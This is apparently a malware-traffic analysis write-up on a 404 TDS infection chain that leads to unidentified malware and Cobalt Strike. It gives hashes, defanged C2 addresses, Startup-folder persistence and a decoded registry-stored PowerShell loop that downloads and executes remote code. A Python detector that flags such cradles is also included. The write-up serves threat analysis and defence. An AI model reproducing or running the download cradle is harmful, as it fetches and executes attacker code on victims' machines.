2023-11-06 (MONDAY) - 404 TDS --> UNIDENTIFIED MALWARE --> COBALT STRIKE
NOTICE:
- Of note, the zip archives on this page have been updated, and they now use the new password scheme. For the new password, see the "about" page of this website.
ASSOCIATED FILES:
- 2023-11-06-IOCs-from-404TDS-to-malware-to-CobaltStrike.txt.zip 2.0 kB (2,007 bytes)
- 2023-11-06-404TDS-to-malware-to-Cobalt-Strike.pcap.zip 4.9 MB (4,865,381 bytes)
- 2023-11-06-404TDS-unidentified-malware-and-artifacts.zip 166 kB (167,417 bytes)
NOTES:
- Unidentified malware from 404 TDS distribution today.
INFECTION CHAIN:
- URL --> 404 TDS chain --> .js file --> initial C2 --> follow-up C2 --> Cobalt Strike
ASSOCIATED MALWARE:
- SHA256 hash: cf40754a3dc7d536b455086f349f9d7445bc4bcd01b6718bd800a80d6f9dca95
- File size: 2,439 bytes
- File name: KPUW1359_2087960.js
- File type: ASCII text, with very long lines (945)
- File description: .js file downloaded from 404 TDS link
- SHA256 hash: d09c7908c39e2a3255811722903d37df6bf7a2083958abff5ded2732f412047e
- File size: 318,464 bytes
- File location: hxxp[:]//170.130.165[.]37/RClient.dll
- Saved location: C:\Users\Public\sdriver.dll
- File type: PE32+ executable (DLL) (console) x86-64, for MS Windows
- File description: 64-bit DLL for unidentified malware
- Run method: unknown
PERSISTENCE:
- Description: Windows shortcut in Start Menu's Startup directory
- Location: C:\Users\[username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
- Shortcut: %windir%\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -Exec -nop -enc (Get-ItemProperty -Path 'HKCU:\Software\Classes\msslnooo' -Name t).t
REGISTRY UPDATE:
- Key: HKEY_CURRENT_USER\SOFTWARE\Classes\msslnooo
- Value 0
- Value Name: t
- Value Type: REG_SZ
- Value Data: [base64 string]
- Decoded base64 string: while($true){IEX(New-Object Net.WebClient).DownloadString("hxxp[:]//ftroftrodro[.]top:80/debug/fBTRdJs="); Start-Sleep -s 3600}
- Note: No traffic seen to ftroftrodro[.]top, but it resolved to 170.130.165[.]37 when pinged
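Decoding the persistence chain above (Startup .lnk launching powershell -enc on a value read from HKCU:\Software\Classes) as an added Python example; this is not code from the write-up. The page elides the real REG_SZ data, so the sample rebuilds it from the decoded loop listed above (kept in defanged form), and the registry snapshot is a constructed dict standing in for a live hive.

```python
import base64
import re

# Added example (not the write-up's code): flag and decode a registry-backed PowerShell cradle.
# PowerShell's -EncodedCommand (and its prefixes -e, -ec, -enc) take base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"-e(?:nc(?:odedcommand)?|c)?\b", re.I)
REG_REF = re.compile(r"Get-ItemProperty\s+-Path\s+'(?P<key>[^']+)'\s+-Name\s+(?P<name>\w+)", re.I)
CRADLE_PATTERNS = ("IEX", "Invoke-Expression", "DownloadString",
                   "New-Object Net.WebClient", "while($true)", "Start-Sleep")

def normalize_key(path: str) -> str:
    """Map the PSDrive form HKCU:\\... onto HKEY_CURRENT_USER\\..., case-folded."""
    path = path.rstrip("\\")
    return re.sub(r"^HKCU:", "HKEY_CURRENT_USER", path, flags=re.I).upper()

def registry_reference(lnk_target: str):
    """(key, value name) if the target runs powershell -enc on a value read via Get-ItemProperty."""
    if "powershell" not in lnk_target.lower() or not ENC_FLAG.search(lnk_target):
        return None
    m = REG_REF.search(lnk_target)
    return (normalize_key(m["key"]), m["name"].lower()) if m else None

def decode_encoded_command(b64: str) -> str:
    """Decode an -enc payload; ASCII stored as UTF-16LE has a zero byte at every odd offset."""
    raw = base64.b64decode(b64)
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")

def assess(lnk_target: str, registry: dict) -> dict:
    """registry maps (normalized key, value name) -> REG_SZ data, standing in for a live hive."""
    ref = registry_reference(lnk_target)
    if ref is None:
        return {"suspicious": False, "reason": "no registry-backed encoded command"}
    data = registry.get(ref)
    if data is None:
        return {"suspicious": True, "reason": "referenced value missing", "registry_value": ref}
    decoded = decode_encoded_command(data)
    hits = [p for p in CRADLE_PATTERNS if p.lower() in decoded.lower()]
    return {"suspicious": bool(hits), "registry_value": ref, "decoded": decoded, "indicators": hits}

# Constructed sample built from the artifacts listed above; the page elides the real base64
# value, so it is rebuilt here from the decoded loop (kept in the page's defanged form).
LNK_TARGET = (r"%windir%\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -Exec -nop -enc "
              r"(Get-ItemProperty -Path 'HKCU:\Software\Classes\msslnooo' -Name t).t")
DECODED_LOOP = ('while($true){IEX(New-Object Net.WebClient).DownloadString('
                '"hxxp[:]//ftroftrodro[.]top:80/debug/fBTRdJs="); Start-Sleep -s 3600}')
SAMPLE_REGISTRY = {(normalize_key(r"HKEY_CURRENT_USER\SOFTWARE\Classes\msslnooo"), "t"):
                   base64.b64encode(DECODED_LOOP.encode("utf-16-le")).decode()}
```

Run `assess(LNK_TARGET, SAMPLE_REGISTRY)` to see the decoded loop and the cradle indicators it trips; the same function applied to ordinary shortcut targets returns a non-suspicious result.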
OTHER ARTIFACTS:
- SHA256 hash: 7e347a488aa085b1939d86488a6d204d0782604c9fad56731054da789b27edeb
- File size: 467 bytes
- File location: C:\Users\[username]\AppData\Local\Temp\w1.js
- SHA256 hash: 746756065971e5168ecaeb5507aa6c449bbb88e90bb3537be4a470299a0679aa
- File size: 289 bytes
- File location: C:\Users\[username]\AppData\Local\Temp\w2.js
INFECTION TRAFFIC:
REDIRECT PATH TO INITIAL .JS FILE DOWNLOAD:
- port 443 - hxxps[:]//truckjeepsuvparts[.]com/7b4/88ooy4cpn4j
- port 443 - hxxps[:]//tradembs[.]com/wgaj4w
- port 443 - hxxps[:]//medilabr[.]com/wnmwhg/
INITIAL C2:
- 170.130.55[.]46 port 80 - 170.130.55[.]46 - POST /
FOLLOW-UP C2:
- 170.130.55[.]117 port 8080 - TLSv1.2 HTTPS traffic, self-signed certificate
- 170.130.55[.]117 port 443 - TCP traffic, not encrypted, but with plain text and base64 strings
FOLLOW-UP REMOTE ACCESS MALWARE:
- 170.130.165[.]37 port 80 - 170.130.165[.]37 - GET /RClient.dll
- 170.130.165[.]107 port 1444 - TCP traffic
COBALT STRIKE:
- 170.130.55[.]150 port 80 - 170.130.55[.]150 - GET /ah
- 170.130.55[.]150 port 80 - 170.130.55[.]150 - GET /jquery-3.3.1.min.js
- 170.130.55[.]150 port 80 - 170.130.55[.]150 - GET /jquery-3.3.1.slim.min.js
- 170.130.55[.]150 port 80 - 170.130.55[.]150 - POST /jquery-3.3.2.min.js?__cfduid=[18 or 19 character base64 text]
TRAFFIC FROM THE INFECTED HOST TO THE DOMAIN CONTROLLER:
- [victim's internal IP address] port 5985 - [domain controller]:5985 - POST /wsman?PSVersion=5.1.19041.3570